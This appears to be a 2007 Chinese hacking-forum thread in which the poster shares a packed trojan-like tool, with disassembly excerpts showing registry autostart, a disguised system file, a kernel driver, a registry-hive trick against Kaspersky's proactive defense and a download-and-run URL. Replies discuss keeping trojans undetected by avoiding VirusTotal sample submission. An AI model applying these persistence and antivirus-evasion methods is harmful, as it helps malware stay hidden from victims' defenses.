软件作者：eeiwolf
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

没写配置 加了个自己壳
高手可以自己脱壳
写注册表实现自启动启动
然后下载了个 winrar.exe 在 c:\eeiwolf.exe 运行

主要优点
HOHO
过主动防御(我貌似很喜欢作弄卡吧)
不插进程过墙

呵呵
用了些比较杂碎的技术
比如XYZREG所说的过注册表监控
ICE跟下
很清楚的
加壳主要防止被恶意使用
高手除外

没意思～
加壳也没有用～
懒得脱了～
提交往VirusTotal看看，看看是不是都是no virus～

系统文件
00401574 |. 68 70844000  push  00408470             ; UNICODE """C:\WINDOWS\system32\Navapw32.exe"""
00401579 |. 68 00854000  push  00408500             ; ASCII "Navapw.exe"
服务
00401694 |. C705 0C974000>mov   dword ptr [40970C], 00408648   ; ASCII "SYSTEM\CurrentControlSet\Services\{FFF87A11-32E3-87FF-321A-679B25EA887C}"
0040169E |. E8 6D020000  call  00401910
004016A3 |. 83C4 08    add   esp, 8
004016A6 |. 85C0     test  eax, eax
004016A8 |. 0F85 F2000000 jnz   004017A0
004016AE |. 68 B8844000  push  004084B8             ; ASCII "Dump registry hive SUCCESS!",LF
004016B3 |. E8 E5190000  call  0040309D
004016B8 |. 6A 01     push  1
004016BA |. 68 F0F0F0F0  push  F0F0F0F0
004016BF |. 68 34864000  push  00408634             ; UNICODE "ksymc.sys"
004016C4 |. 68 28864000  push  00408628             ; ASCII "DisplayName"
驱动
00401733 |. 68 C4854000  push  004085C4             ; UNICODE "\??\C:\WINDOWS\system32\drivers\ksymc.sys"
00401738 |. 68 B0854000  push  004085B0             ; ASCII "Start"
用两个hiv文件过主动
00401D23 |. 68 C8884000  push  004088C8             ; ASCII "Restore HKEY_LOCAL_MACHINE hive SUCCESS!",LF
00401D28 |. E8 70130000  call  0040309D
00401D2D |. 83C4 04    add   esp, 4
00401D30 |. 68 DC834000  push  004083DC             ; ASCII ".\temp.hiv"
00401D35 |. FFD3     call  ebx
00401D37 |. BF 04884000  mov   edi, 00408804          ; ASCII ".\HKLM_WinNT.hiv"
00401D3C |. 83C9 FF    or   ecx, FFFFFFFF
00401D3F |. 33C0     xor   eax, eax
00401D41 |. 68 EC834000  push  004083EC             ; ASCII "Software\Microsoft\Windows NT\CurrentVersion\Windows"
下载一个自解压文件
00401153 |. 68 74804000  push  00408074             ; UNICODE "hxxp://www.winampcn.com/download/wrar37b7sc.exe"

引用:

引用第3楼vxk于2007-05-01 11:33发表的 :
没意思～
加壳也没有用～
懒得脱了～
提交往VirusTotal看看，看看是不是都是no virus～

提到那个网站上去，被杀将会是肯定的，而且用hiv过卡巴防御的方式也很可能被卡巴重视了，因为至少目前卡巴和antivir已经官方承认它们一个重要的病毒库分析来源就是VirusTotal提交的东东。

汗 以后不给VirusTotal提交我做好的免杀木马了
怪不得 刚查的时候好着 等过了一周就挂了

HIV 的方式其实是咔吧对一些注册表函数没有拦截
如果加进去的话 会有很多误报行为

等我把驱动学好了，自己写数据包发，看主动防御有什么用

virus total可以选择不提交给杀毒厂商。

我也不知道哪个不提交到底灵不灵，好多东西没按不提交倒是被杀了，按了提交的倒是没杀，晕啊

引用:

引用第9楼飞天灵狐于2007-05-15 20:36发表的 :
我也不知道哪个不提交到底灵不灵，好多东西没按不提交倒是被杀了，按了提交的倒是没杀，晕啊

你说的情况证实这个按钮是有用的。那个按钮是这样的
“［］不要提交病毒样本”

选了勾，就是不提交，当然不杀。
没勾，就是要提交，当然要杀。

唉。。。。。。。。。

选不选勾都会提交，让你选勾是安慰你一下 ！！

选了勾，就是不提交，当然不杀

在趋势2007下测试被报警了，不知趋势是如何检测的，ms不是ssdt hook

拥有防火墙和杀软件,还需要吗

有没有加壳的没．．．．．．

根本没用啊，没的什么注册表位置啊

靠，什么啊，用RAV的，刚下好就报有毒，到底有没有用啊~~~

引用:

引用第11楼lhhxs于2007-07-18 20:10发表的 :
选不选勾都会提交，让你选勾是安慰你一下 ！！

说的很对 事实就是这样子 所以大家不要去提交 有条件装几个杀软吧 记得要把杀软的上报都去掉 否则费半天劲 都白费 嘎嘎

引用:

引用第11楼lhhxs于2007-07-18 20:10发表的 :
选不选勾都会提交，让你选勾是安慰你一下 ！！

引用:

引用第18楼185918于2007-09-16 05:08发表的 :

说的很对 事实就是这样子 所以大家不要去提交 有条件装几个杀软吧 记得要把杀软的上报都去掉 否则费半天劲 都白费 嘎嘎

说话要讲证据的.
to 11,18:有什么确定的理由说选勾是安慰么?我也一直virustotal测试的.有些东西很快就被杀了有些东西过了1年还好好的.

to 18:说要把杀软的上报都去掉,那么杀软的上报是否也都是安慰人的呢?MS/GG都在偷偷获取用户信息,杀软想偷偷上传点信息也很容易的事情,能给个不是安慰人的证据么?

顶楼主
一定要学过主动的

引用:

原帖由 justcrack 于 2007-5-14 15:22 发表
virus total可以选择不提交给杀毒厂商。

我估计选不选都会被提交的   也就是给你一个安慰 ....  说不定 选了就被提交的可能变大 ...